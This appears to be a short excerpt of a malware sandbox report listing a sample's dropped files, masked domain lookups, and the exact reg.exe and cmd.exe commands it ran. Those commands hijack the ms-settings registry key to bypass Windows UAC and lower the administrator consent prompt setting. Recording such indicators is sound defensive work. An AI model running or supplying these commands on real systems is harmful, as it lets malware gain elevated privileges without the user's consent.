Technical Information
- [<HKCU>\SOFTWARE\Classes\ms-settings\shell\open\command] '' = '<SYSTEM32>\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_...
- %TEMP%\gabb.exe
- %TEMP%\uac.bat
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- http://ic###azip.com/
- DNS ASK cd#.##scordapp.com
- DNS ASK microsoft.com
- DNS ASK ic###azip.com
- DNS ASK ge###tatool.com
- '%TEMP%\gabb.exe'
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\UAC.bat"
- '<SYSTEM32>\reg.exe' ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "<SYSTEM32>\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdm...
- '<SYSTEM32>\reg.exe' ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\DC.exe" /D